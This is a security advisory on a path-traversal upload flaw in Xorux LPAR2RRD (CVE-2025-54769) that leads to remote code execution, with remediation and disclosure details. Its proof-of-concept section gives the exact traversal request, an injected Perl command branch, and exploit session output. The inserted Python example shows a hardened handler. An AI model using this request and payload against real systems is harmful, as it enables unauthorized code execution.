Advisory ID: KL-001-2025-016
Published: 2025-07-28
Vendor: Xorux

Affected Systems

Product: LPAR2RRD
Version: 8.04 and prior
Platform: Rocky Linux 8.10

Discovered By

Jim Becher (KoreLogic)

Vulnerability Details

Affected Vendor: Xorux
Affected Product: LPAR2RRD
Affected Version: 8.04 and prior
Platform: Rocky Linux 8.10
CWE Classification: CWE-24: Path Traversal: '../filedir', CWE-434: Unrestricted Upload of File with Dangerous Type, CWE-648: Incorrect Use of Privileged APIs
CVE ID: CVE-2025-54769

Vulnerability Description

An authenticated, read-only user can upload a file and perform a directory traversal so that the uploaded file is placed in a location of their choosing. This can be used to overwrite existing Perl modules within the application, allowing an attacker to achieve remote code execution (RCE).

Technical Description

The filename in the upload request can be altered by hand to direct where on the local filesystem of the Xormon Original appliance the upgrade file is placed. The appliance recognizes that the file is not a valid upgrade package, but still writes it to the filesystem. This can be exploited to write a valid Perl script into the /home/lpar2rrd/lpar2rrd/bin/ directory, where it can be called by existing scripts that are reachable via a https://<IP>/lpar2rrd-cgi/<script> URL.
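The two defects described above, a client-controlled filename used as a filesystem path and a write that happens before the package check, shown together in a hardened form. This is an added Python illustration, not LPAR2RRD's own (Perl) code; the form field and filename come from the proof of concept on this page, and the validate callable is an assumed stand-in for whatever package check the product performs.

```python
import os
import re

# Constructed sample: the multipart part header from the advisory's PoC request,
# carrying a client-chosen path instead of a bare filename.
SAMPLE_DISPOSITION = (
    'form-data; name="upgfile"; filename="../home/lpar2rrd/lpar2rrd/bin/users.pl"'
)

_FILENAME_RE = re.compile(r'filename="([^"]*)"')


def extract_filename(disposition):
    """Return the client-supplied filename from a Content-Disposition value."""
    match = _FILENAME_RE.search(disposition)
    return match.group(1) if match else ""


def is_traversal(filename):
    """A safe upload name is one path component: no separators, no '.'/'..', no NUL."""
    norm = filename.replace("\\", "/")
    return norm in ("", ".", "..") or "/" in norm or "\0" in norm


def _write_file(path, data):
    with open(path, "wb") as fh:
        fh.write(data)


def handle_upload(disposition, data, upload_dir, validate, write=_write_file):
    """Hardened ordering for an upgrade-upload handler.

    validate(data) stands in for the product's own package check (assumed
    interface); write(path, data) is injectable so the flow can be exercised
    without touching disk.  Nothing reaches the filesystem unless the name
    is a plain filename AND the content passed validation.
    """
    name = extract_filename(disposition)
    if is_traversal(name):
        return {"success": False, "message": "invalid filename", "written": False}
    if not validate(data):
        # Same verdict the appliance returned in the PoC, but here nothing is written.
        return {"success": False, "message": "This file doesn't look like the upgrade package", "written": False}
    dest = os.path.join(os.path.realpath(upload_dir), name)
    write(dest, data)
    return {"success": True, "message": "stored", "written": True, "path": dest}
```

Rejecting, rather than silently stripping, a name that carries path components also gives the access log a distinct failure to alert on.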

Mitigation and Remediation Recommendation

Xorux released version 8.05, which includes a remediation for this vulnerability. See https://lpar2rrd.com/note800.php.

Credit

This vulnerability was discovered by Jim Becher of KoreLogic, Inc.

Proof of Concept

A simple proof of concept is to alter the users.pl script and add some additional logic that runs the id command. The POST is performed as a read-only user, authenticated via Basic Auth.

    POST /lpar2rrd-cgi/upgrade.sh HTTP/1.1
    Host: 172.31.255.207
    Cookie: browserTZ=America%2FChicago
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=----geckoformboundaryc85a7a0a8e67e32643575b13f47b175f
    Content-Length: 15057
    Origin: https://172.31.255.207
    Authorization: Basic amJlY2hlcjpqYmVjaGVy
    Referer: https://172.31.255.207/lpar2rrd/index.html?amenu=upgrade&tab=0
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Priority: u=0
    Te: trailers
    Connection: keep-alive

    ------geckoformboundaryc85a7a0a8e67e32643575b13f47b175f
    Content-Disposition: form-data; name="upgfile"; filename="../home/lpar2rrd/lpar2rrd/bin/users.pl"
    Content-Type: application/x-perl

    use strict;
    use warnings;
    use CGI::Carp qw(fatalsToBrowser);
    use Data::Dumper;
    ...
    [SNIPPED for brevity]
    # Kore
    elsif ( $PAR{cmd} eq "kore" ) {
      my $out;
      print "Content-type: text/html\n\n";
      $out = system("/usr/bin/id");
      print $out;

    }
    ...
    [SNIPPED for brevity]

The response from the Xormon Original appliance is:

    HTTP/1.1 200 OK
    Date: Thu, 03 Apr 2025 00:37:18 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/json
    Content-Length: 93

    { "success": false, "message" : "This file doesn't look like the upgrade package", "log": ""}

But the file is still written to the filesystem. Subsequent calls to the https://<ip>/lpar2rrd-cgi/users.sh script with the added cmd value return the output of the id command, as shown below.

    GET /lpar2rrd-cgi/users.sh?cmd=kore HTTP/1.1
    Host: 172.31.255.207
    Cookie: browserTZ=America%2FChicago
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Authorization: Basic amJlY2hlcjpqYmVjaGVy
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    Priority: u=0, i
    Pragma: no-cache
    Cache-Control: no-cache
    Te: trailers
    Connection: keep-alive

    HTTP/1.1 200 OK
    Date: Thu, 03 Apr 2025 00:37:42 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Content-Length: 61

    uid=1005(lpar2rrd) gid=1005(lpar2rrd) groups=1005(lpar2rrd)
    0

This can be expanded upon to create a full-fledged exploit.

    attacker $ python3 xormon-orig-readonly-rce.py
    >id
    uid=1005(lpar2rrd) gid=1005(lpar2rrd) groups=1005(lpar2rrd)
    0
    >netstat -an | grep LIST | head -10
    tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
    tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:8162            0.0.0.0:*               LISTEN
    tcp6       0      0 :::111                  :::*                    LISTEN
    tcp6       0      0 :::80                   :::*                    LISTEN
    tcp6       0      0 :::22                   :::*                    LISTEN
    tcp6       0      0 ::1:25                  :::*                    LISTEN
    tcp6       0      0 :::8443                 :::*                    LISTEN
    tcp6       0      0 127.0.0.1:39931         :::*                    LISTEN
    0
    >ps -efww | grep "java"
    lpar2rrd     934       1  0 Apr02 ?        01:24:22 /usr/bin/java -Xms512M -Xmx1024M -server -XX:+UseG1GC -Dh2.bindAddress=127.0.0.1 -jar /opt/xorux/xormon/xormon.war
    lpar2rrd 1730823 1730810  0 12:14 ?        00:00:00 sh -c ps -efww | grep "java"
    lpar2rrd 1730825 1730823  0 12:14 ?        00:00:00 grep java
    0
    >quit
    attacker $

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Disclosure Timeline

KoreLogic requests point-of-contact to securely report several vulnerabilities to Xorux.

Vendor provides support@xorux.com as the point-of-contact, noting that they do not use PGP.

KoreLogic submits this vulnerability and four additional discoveries to Xorux.

Vendor acknowledges receipt, stating that the issue has been remediated and a new version of the affected product will be available 2025-07-25.

Xorux publishes updated version of the affected product.

KoreLogic public disclosure.

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable